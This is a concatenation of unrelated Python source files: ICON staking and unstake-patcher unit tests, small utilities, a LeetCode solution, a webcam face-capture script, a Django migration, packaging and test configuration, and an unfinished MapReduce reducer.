tx_list = []
unstake = stake // 1
for i in range(1-1):
for j in range(account_count):
unstake_value = (i+1) * unstake
tx = self.create_set_stake_tx(from_=self._accounts[j], value=stake - unstake_value)
tx_list.append(tx)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
for j in range(account_count):
fee = tx_results[j+1].step_used * tx_results[j+1].step_price
expected_balance = self._accounts[i].balance - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[j]))
self._accounts[i].balance = expected_balance
# unstake all staked value
tx_list = []
for i in range(account_count):
tx = self.create_set_stake_tx(from_=self._accounts[i], value=0)
tx_list.append(tx)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
for i in range(account_count):
fee = tx_results[i+1].step_used * tx_results[i+1].step_price
expected_balance = self._accounts[i].balance - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
self._accounts[i].balance = expected_balance
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 0 icx | 100 icx | 0 icx
# wait expire unstake
remaining_blocks = 0
rets = []
for i in range(account_count):
unstakes_info: list = self.get_stake(self._accounts[0]).get("unstakes")
rets.append(unstakes_info)
unstake_info = unstakes_info[-1]
remaining_blocks = unstake_info["remainingBlocks"]
self.make_empty_blocks(remaining_blocks + 1)
# delegation
expired_icx: int = stake
tx_list = []
for i in range(account_count):
tx = self.create_set_delegation_tx(
from_=self._accounts[i],
origin_delegations=[
(
self._accounts[i],
0
)
]
)
tx_list.append(tx)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
for i in range(account_count):
fee = tx_results[i+1].step_used * tx_results[i+1].step_price
expected_balance = self._accounts[i].balance - fee + expired_icx
self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
# check expired_icx 1
account0_unstakes_info = unstakes_info_per_account[0]
expired_unstake = (
account0_unstakes_info[0]["unstake"],
account0_unstakes_info[0]["unstakeBlockHeight"]
)
self._check_expired_icx_release(account_count=account_count)
def test_fix_bug_rev11_all_success2(self):
account_count: int = 5
initial_balance: int = 150 * ICX_IN_LOOP
stake: int = 100 * ICX_IN_LOOP
unstakes_info_per_account: list = self._setup(
init_balance=initial_balance,
stake=stake,
account_count=account_count
)
# delegation
expired_icx: int = stake
tx_list = []
for i in range(account_count):
tx = self.create_set_delegation_tx(
from_=self._accounts[i],
origin_delegations=[
(
self._accounts[i],
0
)
]
)
tx_list.append(tx)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
for i in range(account_count):
fee = tx_results[i+1].step_used * tx_results[i+1].step_price
expected_balance = self._accounts[i].balance - fee + expired_icx
self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
# check expired_icx 1
account0_unstakes_info = unstakes_info_per_account[0]
expired_unstake = (
account0_unstakes_info[0]["unstake"],
account0_unstakes_info[0]["unstakeBlockHeight"]
)
expired_unstakes_info = [expired_unstake]
self._check_expired_icx(
expired_icx=expired_icx,
expired_unstakes_info=expired_unstakes_info,
account_count=account_count
)
src: list = []
for i in range(account_count):
db_info: dict = self._get_account_info(self._accounts[0])
stake_part: 'StakePart' = db_info["stake"]
data: dict = {
"address": str(self._accounts[i].address),
"total_unstake": stake_part._stake + stake_part._total_unstake(),
"old_unstake_format": False,
"unstakes": [
[
stake_part._unstakes_info[0][0],
stake_part._unstakes_info[0][1]
],
]
}
src.append(data)
targets: List[Target] = [Target.from_dict(i) for i in src]
patcher = UnstakePatcher(targets=targets)
with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
from_path_mock.return_value = patcher
self.set_revision(Revision.FIX_BALANCE_BUG.value)
self._check_expired_icx_release(account_count=account_count)
def test_fix_bug_rev11_all_fail(self):
account_count: int = 5
initial_balance: int = 150 * ICX_IN_LOOP
stake: int = 100 * ICX_IN_LOOP
unstakes_info_per_account: list = self._setup(
init_balance=initial_balance,
stake=stake,
account_count=account_count
)
# delegation
expired_icx: int = stake
tx_list = []
for i in range(account_count):
tx = self.create_set_delegation_tx(
from_=self._accounts[i],
origin_delegations=[
(
self._accounts[i],
0
)
]
)
tx_list.append(tx)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
for i in range(account_count):
fee = tx_results[i+1].step_used * tx_results[i+1].step_price
expected_balance = self._accounts[i].balance - fee + expired_icx
self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
# check expired_icx 1
account0_unstakes_info = unstakes_info_per_account[0]
expired_unstake = (
account0_unstakes_info[0]["unstake"],
account0_unstakes_info[0]["unstakeBlockHeight"]
)
expired_unstakes_info = [expired_unstake]
self._check_expired_icx(
expired_icx=expired_icx,
expired_unstakes_info=expired_unstakes_info,
account_count=account_count
)
src: list = []
for i in range(account_count):
db_info: dict = self._get_account_info(self._accounts[0])
stake_part: 'StakePart' = db_info["stake"]
data: dict = {
"address": str(self._accounts[i].address),
"total_unstake": stake_part._stake + stake_part._total_unstake(),
"old_unstake_format": False,
"unstakes": [
[
stake_part._unstakes_info[0][0] - 1,
stake_part._unstakes_info[0][1]
],
]
}
src.append(data)
targets: List[Target] = [Target.from_dict(i) for i in src]
patcher = UnstakePatcher(targets=targets)
with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
from_path_mock.return_value = patcher
self.set_revision(Revision.FIX_BALANCE_BUG.value)
class TestIISSUnStake3(TestIISSBase):
def test_old_format1(self):
self.init_decentralized()
self.init_inv()
init_balance: int = 150 * ICX_IN_LOOP
stake: int = 100 * ICX_IN_LOOP
# gain 150 icx
self.distribute_icx(
accounts=self._accounts[:1],
init_balance=init_balance
)
self._accounts[0].balance = init_balance
# Balance | Stake | UnStake | Expired_icx
# 150 icx | 0 icx | 0 icx | 0 icx
# set stake
expired_icx: int = stake
tx = self.create_set_stake_tx(from_=self._accounts[0], value=stake)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - stake - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 100 icx | 0 icx | 0 icx
# unstake all staked value
tx = self.create_set_stake_tx(from_=self._accounts[0], value=0)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
res: dict = self.get_stake(self._accounts[0])
remaining_blocks: int = res["remainingBlocks"]
unstake_block_height: int = res["unstakeBlockHeight"]
self.make_empty_blocks(remaining_blocks + 1)
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 0 icx | 100 icx(e) | 100 icx
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
# old format
db_info: dict = self._get_account_info(self._accounts[0])
coin_part: 'CoinPart' = db_info["coin"]
stake_part: 'StakePart' = db_info["stake"]
self.assertEqual(CoinPartFlag.HAS_UNSTAKE, coin_part._flags)
self.assertEqual(0, stake_part._stake)
self.assertEqual(expired_icx, stake_part._unstake)
self.assertEqual(unstake_block_height, stake_part._unstake_block_height)
tx_results: List["TransactionResult"] = self.set_delegation(
from_=self._accounts[0],
origin_delegations=[
(
self._accounts[0],
0
)
]
)
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - fee + expired_icx
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# old format
db_info: dict = self._get_account_info(self._accounts[0])
coin_part: 'CoinPart' = db_info["coin"]
stake_part: 'StakePart' = db_info["stake"]
self.assertEqual(CoinPartFlag.NONE, coin_part._flags)
self.assertEqual(0, stake_part._stake)
self.assertEqual(expired_icx, stake_part._unstake)
self.assertEqual(unstake_block_height, stake_part._unstake_block_height)
# Check Fix logic
data: list = [
{
"address": str(self._accounts[0].address),
"total_unstake": stake_part._stake + stake_part._total_unstake(),
"old_unstake_format": True,
"unstakes": [
[
stake_part._unstake,
stake_part._unstake_block_height
],
]
},
]
targets: List[Target] = [Target.from_dict(i) for i in data]
patcher = UnstakePatcher(targets=targets)
with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
from_path_mock.return_value = patcher
self.set_revision(Revision.FIX_BALANCE_BUG.value)
self._check_unstake_patch()
def test_new_format(self):
self.init_decentralized()
self.init_inv()
init_balance: int = 150 * ICX_IN_LOOP
stake: int = 100 * ICX_IN_LOOP
# gain 150 icx
self.distribute_icx(
accounts=self._accounts[:1],
init_balance=init_balance
)
self._accounts[0].balance = init_balance
# Balance | Stake | UnStake | Expired_icx
# 150 icx | 0 icx | 0 icx | 0 icx
# set stake
expired_icx: int = stake
tx = self.create_set_stake_tx(from_=self._accounts[0], value=stake)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - stake - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 100 icx | 0 icx | 0 icx
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
# unstake all staked value
tx = self.create_set_stake_tx(from_=self._accounts[0], value=0)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
res: dict = self.get_stake(self._accounts[0])
remaining_blocks: int = res["unstakes"][0]["remainingBlocks"]
unstake_block_height: int = res["unstakes"][0]["unstakeBlockHeight"]
self.make_empty_blocks(remaining_blocks + 1)
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 0 icx | 100 icx(e) | 100 icx
# new format
db_info: dict = self._get_account_info(self._accounts[0])
coin_part: 'CoinPart' = db_info["coin"]
stake_part: 'StakePart' = db_info["stake"]
self.assertEqual(CoinPartFlag.HAS_UNSTAKE, coin_part._flags)
self.assertEqual(0, stake_part._stake)
self.assertEqual(expired_icx, stake_part._unstakes_info[0][0])
self.assertEqual(unstake_block_height, stake_part._unstakes_info[0][1])
tx_results: List["TransactionResult"] = self.set_delegation(
from_=self._accounts[0],
origin_delegations=[
(
self._accounts[0],
0
)
]
)
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - fee + expired_icx
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# new format
db_info: dict = self._get_account_info(self._accounts[0])
coin_part: 'CoinPart' = db_info["coin"]
stake_part: 'StakePart' = db_info["stake"]
self.assertEqual(CoinPartFlag.NONE, coin_part._flags)
self.assertEqual(0, stake_part._stake)
self.assertEqual(expired_icx, stake_part._unstakes_info[0][0])
self.assertEqual(unstake_block_height, stake_part._unstakes_info[0][1])
data: list = [
{
"address": str(self._accounts[0].address),
"total_unstake": stake_part._stake + stake_part._total_unstake(),
"old_unstake_format": False,
"unstakes": [
[
stake_part._unstakes_info[0][0],
stake_part._unstakes_info[0][1]
],
]
},
]
targets: List[Target] = [Target.from_dict(i) for i in data]
patcher = UnstakePatcher(targets=targets)
with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
from_path_mock.return_value = patcher
self.set_revision(Revision.FIX_BALANCE_BUG.value)
self._check_unstake_patch()
def test_new_format_multi_1_of_2_expired(self):
self.init_decentralized()
self.init_inv()
init_balance: int = 150 * ICX_IN_LOOP
stake: int = 100 * ICX_IN_LOOP
# gain 150 icx
self.distribute_icx(
accounts=self._accounts[:1],
init_balance=init_balance
)
self._accounts[0].balance = init_balance
# Balance | Stake | UnStake | Expired_icx
# 150 icx | 0 icx | 0 icx | 0 icx
# set stake
expired_icx: int = stake // 2
tx = self.create_set_stake_tx(from_=self._accounts[0], value=stake)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - stake - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 100 icx | 0 icx | 0 icx
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
# unstake 1/2 of staked value
unstake = stake // 2
tx = self.create_set_stake_tx(from_=self._accounts[0], value=unstake)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# make empty some blocks for term between unstakes
self.make_empty_blocks(5)
# unstake the rest of staked value
tx = self.create_set_stake_tx(from_=self._accounts[0], value=0)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
res: dict = self.get_stake(self._accounts[0])
unstakes_info = res["unstakes"]
first_slot_remaining: int = unstakes_info[0]["remainingBlocks"]
self.make_empty_blocks(first_slot_remaining + 1)
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 0 icx | 50 icx(e) | 50 icx
# new format
db_info: dict = self._get_account_info(self._accounts[0])
coin_part: 'CoinPart' = db_info["coin"]
stake_part: 'StakePart' = db_info["stake"]
self.assertEqual(CoinPartFlag.HAS_UNSTAKE, coin_part._flags)
self.assertEqual(0, stake_part._stake)
expired_unstake = 0
current_block = self.get_last_block().height
for i, unstake_info in enumerate(stake_part._unstakes_info):
self.assertEqual(unstakes_info[i]["unstakeBlockHeight"], unstake_info[1])
if unstake_info[1] < current_block:
expired_unstake += unstake_info[0]
self.assertEqual(expired_icx, expired_unstake)
tx_results: List["TransactionResult"] = self.set_delegation(
from_=self._accounts[0],
origin_delegations=[
(
self._accounts[0],
0
)
]
)
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - fee + expired_icx
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# new format
db_info: dict = self._get_account_info(self._accounts[0])
coin_part: 'CoinPart' = db_info["coin"]
stake_part: 'StakePart' = db_info["stake"]
self.assertEqual(CoinPartFlag.NONE, coin_part._flags)
self.assertEqual(0, stake_part._stake)
expected_expired_icx = stake_part._unstakes_info[0][0]
self.assertEqual(expected_expired_icx, expired_icx)
self.assertEqual(1, len(stake_part._unstakes_info))
self.assertEqual(expired_icx, stake_part._unstakes_info[0][0])
self.assertEqual(unstakes_info[-1]["unstakeBlockHeight"], stake_part._unstakes_info[0][1])
data: list = [
{
"address": str(self._accounts[0].address),
"total_unstake": stake_part._stake + stake_part._total_unstake(),
"old_unstake_format": False,
"unstakes": [
[
stake_part._unstakes_info[0][0],
stake_part._unstakes_info[0][1]
],
]
},
]
targets: List[Target] = [Target.from_dict(i) for i in data]
patcher = UnstakePatcher(targets=targets)
with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
from_path_mock.return_value = patcher
self.set_revision(Revision.FIX_BALANCE_BUG.value)
self._check_unstake_patch()
def test_new_format_multi_2_of_2_expired(self):
self.init_decentralized()
self.init_inv()
init_balance: int = 150 * ICX_IN_LOOP
stake: int = 100 * ICX_IN_LOOP
# gain 150 icx
self.distribute_icx(
accounts=self._accounts[:1],
init_balance=init_balance
)
self._accounts[0].balance = init_balance
# Balance | Stake | UnStake | Expired_icx
# 150 icx | 0 icx | 0 icx | 0 icx
# set stake
expired_icx: int = stake
tx = self.create_set_stake_tx(from_=self._accounts[0], value=stake)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - stake - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 100 icx | 0 icx | 0 icx
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
# unstake 1/2 of staked value
unstake = stake // 2
tx = self.create_set_stake_tx(from_=self._accounts[0], value=unstake)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# unstake the rest of staked value
tx = self.create_set_stake_tx(from_=self._accounts[0], value=0)
tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - fee
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
res: dict = self.get_stake(self._accounts[0])
unstakes_info = res["unstakes"]
last_slot_remaining: int = unstakes_info[-1]["remainingBlocks"]
self.make_empty_blocks(last_slot_remaining + 1)
# Balance | Stake | UnStake | Expired_icx
# 50 icx | 0 icx | 100 icx(e) | 100 icx
# new format
db_info: dict = self._get_account_info(self._accounts[0])
coin_part: 'CoinPart' = db_info["coin"]
stake_part: 'StakePart' = db_info["stake"]
self.assertEqual(CoinPartFlag.HAS_UNSTAKE, coin_part._flags)
self.assertEqual(0, stake_part._stake)
expected_expired_icx = 0
for i, unstake_info in enumerate(stake_part._unstakes_info):
self.assertEqual(unstakes_info[i]["unstakeBlockHeight"], unstake_info[1])
expected_expired_icx += unstake_info[0]
self.assertEqual(expired_icx, expected_expired_icx)
tx_results: List["TransactionResult"] = self.set_delegation(
from_=self._accounts[0],
origin_delegations=[
(
self._accounts[0],
0
)
]
)
fee = tx_results[1].step_used * tx_results[1].step_price
expected_balance = self._accounts[0].balance - fee + expired_icx
self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
self._accounts[0].balance = expected_balance
# new format
db_info: dict = self._get_account_info(self._accounts[0])
coin_part: 'CoinPart' = db_info["coin"]
stake_part: 'StakePart' = db_info["stake"]
self.assertEqual(CoinPartFlag.NONE, coin_part._flags)
self.assertEqual(0, stake_part._stake)
expected_expired_icx = 0
for i, unstake_info in enumerate(stake_part._unstakes_info):
self.assertEqual(unstakes_info[i]["unstakeBlockHeight"], unstake_info[1])
expected_expired_icx += unstake_info[0]
self.assertEqual(expired_icx, expected_expired_icx)
data: list = [
{
"address": str(self._accounts[0].address),
"total_unstake": stake_part._stake + stake_part._total_unstake(),
"old_unstake_format": False,
"unstakes": [
[
stake_part._unstakes_info[0][0],
stake_part._unstakes_info[0][1]
],
[
stake_part._unstakes_info[1][0],
stake_part._unstakes_info[1][1]
],
]
},
]
targets: List[Target] = [Target.from_dict(i) for i in data]
patcher = UnstakePatcher(targets=targets)
with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
from_path_mock.return_value = patcher
self.set_revision(Revision.FIX_BALANCE_BUG.value)
self._check_unstake_patch()
def _get_account_info(self, account: 'EOAAccount') -> dict:
c_key: bytes = CoinPart.make_key(account.address)
value: bytes = self.get_state_db(c_key)
coin_part: 'CoinPart' = CoinPart.from_bytes(value)
s_key: bytes = StakePart.make_key(account.address)
value: bytes = self.get_state_db(s_key)
state_part: 'StakePart' = StakePart.from_bytes(value)
return {
"coin": coin_part,
"stake": state_part
}
def _check_unstake_patch(self):
get_stake_info: dict = self.get_stake(self._accounts[0])
self.assertNotIn("unstake", get_stake_info)
db_info: dict = self._get_account_info(self._accounts[0])
unstake: int = db_info["stake"]._unstake
unstake_block_height: int = db_info["stake"]._unstake_block_height
unstakes_info: list = db_info["stake"]._unstakes_info
flag: CoinPartFlag = db_info["coin"].flags
self.assertEqual(CoinPartFlag.NONE, flag)
self.assertEqual(0, unstake)
self.assertEqual(0, unstake_block_height)
self.assertEqual(0, len(unstakes_info))
class TestIISSUnStakePatcher(TestIISSBase):
PATH = os.path.join(os.path.dirname(__file__), "./invalid_expired_unstakes/test.json")
def _make_init_config(self) -> dict:
config: dict = super()._make_init_config()
config[ConfigKey.INVALID_EXPIRED_UNSTAKES_PATH] = self.PATH
return config
def test_loader(self):
self.init_decentralized()
self.init_inv()
self.set_revision(Revision.FIX_BALANCE_BUG.value)
expected_data: dict = {
"block_height": 100,
"target_count": 3,
"total_unstake": 50000,
"targets": [
{
"address": "hx001977f6b796a8f0e9c6b6ce3ae1c1a6851099e4",
"total_unstake": 20000,
"old_unstake_format": False,
"unstakes": [
[
10000,
5
],
[
10000,
6
]
]
},
{
"address": "hx00aa98611e6993c907dcd9abf3e6f647fb641229",
"total_unstake": 10000,
"old_unstake_format": True,
"unstakes": [
[
10000,
10
]
]
},
{
"address": "hx0108a796980c03733ab3809f7a2be80ace2ceef3",
"total_unstake": 20000,
"old_unstake_format": False,
"unstakes": [
[
10000,
1
],
[
10000,
2
]
]
}
]
}
with open(self.PATH, "r") as f:
actual_text = f.read()
actual_data: dict = json.loads(actual_text)
self.assertEqual(expected_data, actual_data)
|
StarcoderdataPython
|
6650557
|
<reponame>DistrictDataLabs/entity-resolution
import os
import csv
import nltk
FIXTURES = os.path.join(os.path.dirname(__file__), "..", "fixtures")
PRODUCTS = os.path.join(FIXTURES, "products")
def load_data(name):
with open(os.path.join(PRODUCTS, name), 'r') as f:
reader = csv.DictReader(f)
for row in reader:
yield row
if __name__ == '__main__':
amazon = list(load_data('amazon.csv'))
google = list(load_data('google.csv'))
mapping = list(load_data('perfect_mapping.csv'))
print len(amazon)
print len(google)
print len(mapping)
print amazon[0].keys()
print google[0].keys()
print mapping[0].keys()
|
StarcoderdataPython
|
1950649
|
<filename>app/setting/__init__.py
#coding: utf-8
from flask import Blueprint
setting = Blueprint("setting", __name__)
from . import views
|
StarcoderdataPython
|
5023762
|
test = {
'name': 'unique',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
scm> (unique '())
()
scm> (unique '(1 2 1 3 1 4))
(1 2 3 4)
scm> (unique '(1 2 3 4))
(1 2 3 4)
scm> (unique '(1 1 1 1 1))
(1)
scm> (unique '(c a b c))
(c a b)
scm> (unique '(1 2 3 4 1 2 3 4 1 2 3 4))
(1 2 3 4)
scm> (unique '(a b c a a b b c e c d ))
(a b c e d)
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': r"""
scm> (load 'hw06)
""",
'teardown': '',
'type': 'scheme'
}
]
}
|
StarcoderdataPython
|
4954506
|
# -*- coding: utf-8 -*-
# @Author: 何睿
# @Create Date: 2019-01-16 10:40:41
# @Last Modified by: 何睿
# @Last Modified time: 2019-01-16 11:21:29
class Solution(object):
def findPeakElement(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
count = len(nums)
middle, left, right = 0, 0, count - 1
while left <= right:
# 取中间值
middle = left + ((right - left) >> 1)
# 如果当前是递增的序列,说明较大值在右边(不包括当前节点)
if middle < count - 1 and nums[middle] < nums[middle + 1]:
left = middle + 1
# 如果当前是递减的徐磊,说明较大值在左边(包括当前节点)
if middle < count - 1 and nums[middle] > nums[middle + 1]:
right = middle
# 结束条件:到达了边界或者当前值比左右两个值大
if (middle==0 or nums[middle] > nums[middle - 1]) and (middle == count-1 or nums[middle] > nums[middle + 1]):
return middle
return middle
|
StarcoderdataPython
|
3291572
|
<gh_stars>0
import csv
import cv2
import os
if not os.path.exists('./dataset'):
os.makedirs('./dataset')
name = input("enter your name")
roll = input("enter your id")
row = [name,roll,'A']
l =[]
for root ,dire,filenames in os.walk('dataset'):
for names in dire:
l.append(int(names))
folder = str(l[-1]+1)
os.makedirs(f'./dataset/{folder}')
def add(row):
with open('data.csv','a') as f:
writer = csv.writer(f,lineterminator='\n')
writer.writerow(row)
# with open('data.csv') as f:
# data = csv.reader(f)
# next(data)
# for names in data:
# if names[0] == name:
# print('already exist!!')
# break
# else:
# add(row)
# print('added')
# break
# print(names)
capture = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
framecount = 0
flag,image = capture.read()
while True:
flag,frame = capture.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in faces:
framecount += 1
cv2.imwrite(f'dataset/{folder}/{name}.{roll}.{framecount}.jpg',frame)
print('frame no',framecount,' captured!')
cv2.rectangle(frame, (x,y), (x+w, y+h), (255,0,0), 2)
cv2.waitKey(100)
cv2.imshow('img',frame)
cv2.waitKey(1)
if framecount >200:
break
capture.release()
cv2.destroyAllWindows()
|
StarcoderdataPython
|
5148496
|
<reponame>tkanemoto/django-portfolios<gh_stars>0
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-12 13:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('portfolios', '0035_auto_20170812_1230'),
]
operations = [
migrations.AddField(
model_name='page',
name='address',
field=models.TextField(blank=True, help_text='Postal address', max_length=300, null=True),
),
migrations.AddField(
model_name='page',
name='phone',
field=models.CharField(blank=True, help_text='The contact phone number', max_length=20, null=True),
),
migrations.AlterField(
model_name='socialmedialink',
name='kind',
field=models.CharField(choices=[('facebook', 'Facebook'), ('linkedin', 'LinkedIn'), ('twitter', 'Twitter'), ('soundcloud', 'SoundCloud'), ('spotify', 'Spotify'), ('youtube', 'YouTube'), ('github', 'GitHub')], max_length=20, verbose_name='kind'),
),
]
|
StarcoderdataPython
|
3435903
|
<gh_stars>0
"""
Bablescan examples
Fit multiple peaks in single scan
"""
import os
import numpy as np
import matplotlib.pyplot as plt
import babelscan
scan = babelscan.file_loader(r"C:\Users\dgpor\Dropbox\Python\ExamplePeaks\794940.nxs")
scan.set_error_operation()
print(scan)
res = scan.fit.multi_peak_fit(print_result=True, plot_result=True)
plt.show()
print('Finished')
|
StarcoderdataPython
|
6485599
|
<filename>setup.py
import fnmatch
from setuptools import find_packages, setup
from setuptools.command.build_py import build_py as build_py_orig
excluded = [
'.git*',
'.vscode',
'*workspace',
]
class build_py(build_py_orig):
def find_package_modules(self, package, package_dir):
modules = super().find_package_modules(package, package_dir)
return [
(pkg, mod, file)
for (pkg, mod, file) in modules
if not any(fnmatch.fnmatchcase(file, pat=pattern) for pattern in excluded)
]
setup(name='Workforce_PY',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',
'Programming Language :: Python :: 3.8',
'Topic :: Office/Business :: Scheduling',
'Topic :: Software Development :: Libraries',
],
python_requires='>=3.8',
version='0.1',
author='<NAME>',
author_email='<EMAIL>',
description='A Library for Workforce planning in contact centers.',
long_description_content_type="text/markdown",
url='https://github.com/kpg141260/erlang',
packages=find_packages() ,
long_description=open('README.md').read(),
cmdclass={'build_py': build_py},
zip_safe=True
)
|
StarcoderdataPython
|
6604870
|
# ========================== begin_copyright_notice ============================
#
# Copyright (C) 2020-2021 Intel Corporation
#
# SPDX-License-Identifier: MIT
#
# =========================== end_copyright_notice =============================
# -*- Python -*-
import lit.formats
import lit.util
from lit.llvm import llvm_config
from lit.llvm.subst import ToolSubst
from lit.llvm.subst import FindTool
# Configuration file for the 'lit' test runner.
# name: The name of this test suite.
config.name = 'vc-intrinsics'
# testFormat: The test format to use to interpret tests.
config.test_format = lit.formats.ShTest(not llvm_config.use_lit_shell)
# suffixes: A list of file extensions to treat as test files.
config.suffixes = ['.ll']
# excludes: A list of directories and files to exclude from the testsuite.
config.excludes = ['CMakeLists.txt', 'Plugin']
used_llvm = "llvm{}".format(config.llvm_version_major)
config.available_features = [used_llvm]
# test_source_root: The root path where tests are located.
config.test_source_root = os.path.dirname(__file__)
# test_exec_root: The root path where tests should be run.
config.test_exec_root = os.path.join(config.test_run_dir, 'test_output')
llvm_config.use_default_substitutions()
config.substitutions.append(('%PATH%', config.environment['PATH']))
tool_dirs = [config.llvm_tools_dir]
# Add extra args for opt to remove boilerplate from tests.
opt_extra_args = ['-load', config.vc_intrinsics_plugin]
# Add option for new pass manager plugins. Extension instead of
# replacement is needed to hack option parsing mechanism. Argument of
# '-load' is processed during initial option parsing and all passes
# from plugin are registed in legacy PM. This registration allows to
# add passes to new PM via command line options in the same way as
# with old PM. Otherwise, -passes=<pass> option will be used for new PM and
# -<pass> for old PM. Additionally, LLVM will load plugin only once
# because it permanently loads libraries with caching behavior.
if int(config.llvm_version_major) >= 13:
opt_extra_args.extend(['-load-pass-plugin', config.vc_intrinsics_plugin])
tools = [ToolSubst('opt', extra_args=opt_extra_args)]
llvm_config.add_tool_substitutions(tools, tool_dirs)
|
StarcoderdataPython
|
3555222
|
<filename>simax/tasks/none_task.py<gh_stars>0
from simax.tasks.base_task import BaseTask
class NoneTask(BaseTask):
def cycle(self):
return None
|
StarcoderdataPython
|
6410939
|
import sys
def reducer():
# previous key
old_user = None
# final row structure of data set
row = {
'user_id': None,
'id': None,
'title': None,
'tagnames': None,
'node_type': None,
'parent_id': None,
'abs_parent_id': None,
'added_at': None,
'score': None,
'reputation': None,
'gold': None,
'silver': None,
'bronze': None,
}
for line in sys.stdin:
data = line.split('\t')
# the line with user data will come first
# due to shuffle sort
if len(data) == 5:
row['user_id'] = data[0]
row['reputation'] = data[1]
row['gold'] = data[2]
row['silver'] = data[3]
row['bronze'] = data[4]
continue
elif len(data) == 9:
# fill data from forum post
i = 0
for key in row:
if i >= 9:
break
row[key] = data[i]
i += 1
print(row)
# new user ?
# if old_user is not None and old_user != row['user_id']:
# print(row)
# # do not clear row as next line with
# # let it be overwritten by the next line
# # row = dict({key: None for key in row})
#
